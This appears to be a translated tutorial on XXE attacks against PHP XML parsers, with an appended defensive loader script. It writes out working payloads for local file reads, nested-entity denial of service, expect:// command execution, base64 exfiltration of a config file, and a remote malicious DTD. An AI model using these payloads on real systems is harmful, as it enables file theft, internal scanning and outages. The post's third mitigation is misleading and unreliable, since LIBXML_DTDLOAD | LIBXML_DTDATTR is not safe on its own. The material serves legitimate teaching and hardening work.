PHP XXE attack

Source: Internet
Author: User
Tags: base64

PHP entities:

Pre-defined: the built-in entities such as &lt; and &amp;, and numeric character references such as &#37;.

General entity: declared as <!ENTITY general "Hello">, called as <a>&general;</a>; it cannot be used inside an attribute.

Parameter entity: declared as <!ENTITY % param "world">; it is called, and used immediately, as %param; inside the DTD.

Both general entities and parameter entities can reference internal resources (declarations inside the DTD) and external resources.

Harm:

(1) Local file read

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodname>&xxe;</methodname>

(2) DoS attacks (e.g. referencing /dev/zero), or nested entity expansion ("billion laughs"):

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

(3) Access to resources on the LAN

(4) Port scanning (e.g. http://192.168.1.3:22)

(5) Use of particular protocol handlers to fetch resources (PHP: http; Java: gopher in older versions, ftp in newer versions)

(6) Command execution: if PHP has the expect extension loaded, system commands can be executed, e.g. <!ENTITY a SYSTEM 'expect://uname'>

General exploitation approaches:

1. Normal output: the expanded entity is echoed back in the response.

2. Using error information, such as XML parse errors or DTD/schema validation messages.

3. Files of interest in web systems: web.xml, tomcat-users.xml, jetty.xml, httpd.conf.

   Read them via php://filter/convert.base64-encode/resource=web.xml (requires allow_url_fopen = On).

4. Blind techniques, XSD value brute force.

How parameter entities are resolved:

To load an external entity, e.g.:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY % internal SYSTEM "local_file.xml">
%internal;
]>

local_file.xml:

<!ENTITY title "Hello, world!">

The parsed effect is that %internal; is replaced with <!ENTITY title "Hello, world!">.

Out-of-band attack:

test.php

<?php
libxml_use_internal_errors(true);
// Called with no argument, so the default (true) applies: the external entity loader is disabled.
libxml_disable_entity_loader();

$xml1 = <<<EOF
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE any [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>
EOF;

$dom1 = new DOMDocument();
$dom1->loadXML($xml1);
print_r($dom1);

$fields = $dom1->getElementsByTagName('x');
foreach ($fields as $field) {
    print_r($field->nodeName);
    print_r($field->textContent);
}
print_r($dom1->saveXML());

$xx = simplexml_load_string($xml1);
print_r($xx);

print_r(libxml_get_errors());
libxml_clear_errors();
print_r("Enderror");
?>

With allow_url_fopen = 0, SYSTEM "http://127.0.0.1:22" is not allowed in an entity; the same applies to FTP.

A normal (general) entity can only appear in element content and is not allowed in an attribute, e.g. <a>&xxe;</a>.

During the experiment I found that print_r($dom->saveXML()) did not output the parsed content. Tracing with strace showed that /etc/passwd was accessed, but nothing was output: only the content before the unresolved &xxe; was printed. Why was it not output? Possibly the output function does not work here; accessing the content in another way gives normal output.

php -i gives the compile-time information, including the supported modules; for example, to find the libxml used by DOM:

dom

DOM/XML => enabled
DOM/XML API Version => 20031129
libxml Version => 2.7.8
HTML Support => enabled
XPath Support => enabled
XPointer Support => enabled
Schema Support => enabled
RelaxNG Support => enabled

libxml

libXML support => active
libXML Compiled Version => 2.7.8
libXML Loaded Version => 20708
libXML streams => enabled

SimpleXML

Simplexml support => enabled
Revision => $Revision: 314376 $
Schema support => enabled

xml

XML Support => active
XML Namespace Support => active
libxml2 Version => 2.7.8

Formats built on XML include SVG, Office document formats such as docx and xlsx, and plain XML itself.

The following functions are affected: DOMDocument::loadXML(), simplexml_load_file(), the XMLReader functions, and load().

Exfiltration tip:

<?xml version="1.0"?>
<!DOCTYPE results [<!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.ini">]>
<results><result>&harmless;</result></results>

How to introduce external entities:

test.php: [screenshot test_php.png; image not available]

evil.dtd: [screenshot evil_php.png; image not available]

Results: [screenshot result.png; image not available]

(2) In attributes (only PHP allows this):

test1.php

$xml1 = <<<EOF
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://10.65.60.111/evil.dtd2">
%remote;
%param1;
]>
<root attrib="&internal;"/>
EOF;

evil.dtd2:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">

Unsuccessful; it generally reports an internal error.

Solution:

1. Upgrade the libxml2 library to version 2.9 or later; from 2.9 on, external entities are not resolved by default.

2. Call libxml_disable_entity_loader(true) before loading the document, to disable the external entity loader.

3. If parsing with XMLReader or DOM:

$doc = XMLReader::xml($badXml, 'UTF-8', LIBXML_NONET);

With the DOM functionality:

$dom = new DOMDocument();
$dom->loadXML($badXml, LIBXML_DTDLOAD | LIBXML_DTDATTR);
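As an added example (not code from the original post), the following PHP script ties together the php -i check above and the three solutions: it reports which libxml the running PHP uses, and provides a loader that refuses any document carrying a DOCTYPE, disables the external entity loader on PHP versions where that call is still needed, passes LIBXML_NONET, and never passes LIBXML_NOENT, LIBXML_DTDLOAD or LIBXML_DTDATTR. The function names safe_load_xml() and xml_environment_report(), the file name, and the two sample documents are constructed for this example.

```php
<?php
declare(strict_types=1);
// Added example, not code from the original post. Assumes PHP >= 7.4 with the
// dom and libxml extensions. Function names and sample documents are constructed.

/**
 * Report what the current PHP build offers, in the spirit of the php -i check:
 * which libxml is loaded and whether external entities are off by default.
 */
function xml_environment_report(): array
{
    return [
        'libxml_version'                   => LIBXML_DOTTED_VERSION,
        'external_entities_off_by_default' => version_compare(LIBXML_DOTTED_VERSION, '2.9.0', '>='),
        'disable_entity_loader_exists'     => function_exists('libxml_disable_entity_loader'),
    ];
}

/**
 * Parse untrusted XML with DTD and entity processing refused.
 * Throws InvalidArgumentException instead of returning a partially parsed tree.
 */
function safe_load_xml(string $xml): DOMDocument
{
    // 1. Refuse any document that carries a DOCTYPE at all. Without a DTD no
    //    entity can be declared, so file:// reads, out-of-band fetches and
    //    nested "lol" expansion all become impossible, whatever the parser flags.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }

    // 2. On libxml < 2.9 the external entity loader is on by default, so turn it
    //    off explicitly. PHP 8.0 deprecated this call because libxml 2.9+ no
    //    longer loads external entities unless LIBXML_NOENT/LIBXML_DTDLOAD ask for it.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    // 3. Collect parser errors rather than emitting warnings, block network
    //    access during parsing, and never pass LIBXML_NOENT, LIBXML_DTDLOAD
    //    or LIBXML_DTDATTR.
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $ok  = $dom->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($ok === false) {
        $msg = $errors !== [] ? trim($errors[0]->message) : 'unknown parse error';
        throw new InvalidArgumentException('XML rejected: ' . $msg);
    }
    return $dom;
}

// Constructed inputs: a harmless document and one that declares an external entity.
$harmless = '<?xml version="1.0"?><results><result>ok</result></results>';
$with_dtd = '<?xml version="1.0"?>'
    . '<!DOCTYPE results [<!ENTITY e SYSTEM "file:///etc/passwd">]>'
    . '<results><result>&e;</result></results>';

print_r(xml_environment_report());

$dom = safe_load_xml($harmless);
echo 'parsed: ', $dom->getElementsByTagName('result')->item(0)->textContent, PHP_EOL;

try {
    safe_load_xml($with_dtd);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Run it with php safe_xml.php (file name assumed). Rejecting the DOCTYPE up front is what turns the parser flags into a second line of defence rather than the only one: the LIBXML_DTDLOAD | LIBXML_DTDATTR flags in solution 3 still ask libxml to load the DTD, so they only stay safe while the entity loader is disabled first. Without a DOCTYPE there is nowhere to declare an entity, which also rules out the nested-expansion DoS from section (2).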


